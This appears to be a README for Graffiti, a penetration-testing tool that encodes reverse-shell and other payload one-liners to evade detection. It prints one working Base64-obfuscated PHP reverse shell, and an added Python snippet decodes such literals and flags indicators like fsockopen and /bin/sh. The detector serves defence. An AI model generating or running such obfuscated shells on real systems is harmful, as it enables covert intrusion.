Graffiti - A Tool To Generate Obfuscated One Liners To Aid In Penetration Testing
Graffiti is a tool to generate obfuscated oneliners to aid in penetration testing situations. Graffiti accepts the following languages for encoding:
- Python
- Perl
- Batch
- Powershell
- PHP
- Bash
Features
Graffiti comes complete with a database that will insert each encoded payload into it, in order to allow end users to view already created payloads for future use. The payloads can be encoded using the following techniques:
- Xor
- Base64
- Hex
- ROT13
- Raw
- Terminal drop in access, with the ability to run external commands
- Ability to create your own payload JSON files
- Ability to view cached payloads inside of the database
- Ability to run the database in memory for quick deletion
- Terminal history and saving of terminal history
- Auto tab completion inside of terminal
- Ability to securely wipe the history files and database file
- Multiple encoding techniques as mentioned above
Usage
Graffiti comes with a builtin terminal; when you pass no flags to the program it will drop into the terminal. The terminal has history, the ability to run external commands, and its own internal commands. In order to get help, you just have to type help or ?:

  ________              _____  _____.__  __  .__
 /  _____/___________ _/ ____\/ ____\__|/  |_|__|
/   \  __\_  __ \__  \\   __\\   __\|  \   __\  |
\    \_\  \  | \// __ \|  |   |  |  |  ||  | |  |
 \______  /__|  (____  /__|   |__|  |__||__| |__|
        \/           \/
v(0.1)

no arguments have been passed, dropping into terminal type `help/?` to get help, all commands that sit inside of `/bin` are available in the terminal
root@graffiti: /graffiti# ?

 Command      Description
---------    --------------
 help/?       Show this help
 external     List available external commands
 cached       Display all payloads that are already in the database
 list/show    List all available payloads
 search       Search for a specific payload
 use          Use this payload and encode it using a specified coder
 info         Get information on a specified payload
 check        Check for updates
 history      Display command history
 exit/quit    Exit the terminal and running session
 encode       Encode a provided payload

root@graffiti: /graffiti# help

 Command      Description
---------    --------------
 help/?       Show this help
 external     List available external commands
 cached       Display all payloads that are already in the database
 list/show    List all available payloads
 search       Search for a specific payload
 use          Use this payload and encode it using a specified coder
 info         Get information on a specified payload
 check        Check for updates
 history      Display command history
 exit/quit    Exit the terminal and running session
 encode       Encode a provided payload
usage: graffiti.py [-h] [-c CODEC] [-p PAYLOAD]
                   [--create PAYLOAD SCRIPT-TYPE PAYLOAD-TYPE DESCRIPTION OS]
                   [-l]
                   [-P [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION ...]]]
                   [-lH LISTENING-ADDRESS] [-lP LISTENING-PORT] [-u URL] [-vC]
                   [-H] [-W] [--memory] [-mC COMMAND [COMMAND ...]]

optional arguments:
  -h, --help            show this help message and exit
  -c CODEC, --codec CODEC
                        specify an encoding technique (*default=None)
  -p PAYLOAD, --payload PAYLOAD
                        pass the path to a payload to use (*default=None)
  --create PAYLOAD SCRIPT-TYPE PAYLOAD-TYPE DESCRIPTION OS
                        create a payload file and store it inside of
                        ./etc/payloads (*default=None)
  -l, --list            list all available payloads by path (*default=False)
  -P [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION ...]], --personal-payload [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION ...]]
                        pass your own personal payload to use for the encoding
                        (*default=None)
  -lH LISTENING-ADDRESS, --lhost LISTENING-ADDRESS
                        pass a listening address to use for the payload (if
                        needed) (*default=None)
  -lP LISTENING-PORT, --lport LISTENING-PORT
                        pass a listening port to use for the payload (if
                        needed) (*default=None)
  -u URL, --url URL     pass a URL if needed by your payload (*default=None)
  -vC, --view-cached    view the cached data already present inside of the
                        database
  -H, --no-history      do not store the command history (*default=True)
  -W, --wipe            wipe the database and the history (*default=False)
  --memory              initialize the database into memory instead of a .db
                        file (*default=False)
  -mC COMMAND [COMMAND ...], --more-commands COMMAND [COMMAND ...]
                        pass more external commands, this will allow them to
                        be accessed inside of the terminal commands must be in
                        your PATH (*default=None)
root@graffiti: /graffiti# python graffiti.py -c base64 -p /linux/php/socket_reverse.json -lH 127.0.0.1 -lP 9065
Encoded Payload:
--------------------------------------------------
php -r 'exec(base64_decode("JHNvY2s9ZnNvY2tvcGVuKCIxMjcuMC4wLjEiLDkwNjUpO2V4ZWMoIi9iaW4vc2ggLWkgPCYzID4mMyAyPiYzIik7"));'
--------------------------------------------------
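From the detection side, a one-liner like the one above still carries its payload as a quoted literal that can be recovered from process command-line logs. The following Python is an added example, not part of Graffiti: it decodes Base64 and hex literals and flags indicator strings. The indicator list, the hex wrapper syntax and the benign sample are assumptions constructed for illustration, and Xor and ROT13 output is not covered.

```python
import base64
import binascii
import re

# Strings worth flagging once a literal is decoded (assumed starter list).
INDICATORS = ("fsockopen", "/bin/sh", "socket", "exec(")
# A quoted run of 16+ base64/hex characters: where an encoded blob would sit.
LITERAL = re.compile(r"""["']([A-Za-z0-9+/=]{16,})["']""")
DECODERS = {
    "base64": lambda s: base64.b64decode(s, validate=True),
    "hex": binascii.unhexlify,
}

def decode_literal(blob):
    """Return [(codec, text)] for every codec that yields readable text."""
    out = []
    for codec, fn in DECODERS.items():
        try:
            text = fn(blob).decode("utf-8")
        except ValueError:  # bad padding, odd-length hex, non-UTF-8 bytes
            continue
        if all(ch.isprintable() or ch.isspace() for ch in text):
            out.append((codec, text))
    return out

def triage(cmdline):
    """Decode quoted blobs in one command line and report indicator hits."""
    findings = []
    for blob in LITERAL.findall(cmdline):
        for codec, text in decode_literal(blob):
            hits = [tok for tok in INDICATORS if tok in text]
            if hits:
                findings.append({"codec": codec, "decoded": text, "hits": hits})
    return findings

# The encoded one-liner printed on this page (base64 codec).
PAGE_CMD = ("php -r 'exec(base64_decode(\"JHNvY2s9ZnNvY2tvcGVuKCIxMjcuMC4wLjEiLDkw"
            "NjUpO2V4ZWMoIi9iaW4vc2ggLWkgPCYzID4mMyAyPiYzIik7\"));'")
# Constructed samples: a hex literal (wrapper syntax assumed) and a benign token.
HEX_CMD = "python -c \"exec(bytes.fromhex('%s'))\"" % b"import socket".hex()
BENIGN_CMD = 'echo "QUJDREVGR0hJSktMTU5PUA=="'

if __name__ == "__main__":
    for line in (PAGE_CMD, HEX_CMD, BENIGN_CMD):
        print(line[:40], "->", triage(line))
```

The benign line decodes cleanly but matches no indicator, so it produces no finding; only decoded content, not the mere presence of an encoded literal, raises a hit.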
A demo of Graffiti can be found here:
Installation
On any Linux, Mac, or Windows system, Graffiti should work out of the box without the need to install any external packages. If you would like to install Graffiti as an executable onto your system (you must be running either Linux or Mac for it to work successfully), all you have to do is the following:
./install.sh
Bugs and issues
If you happen to find a bug or an issue, please create an issue with details here and thank you ahead of time!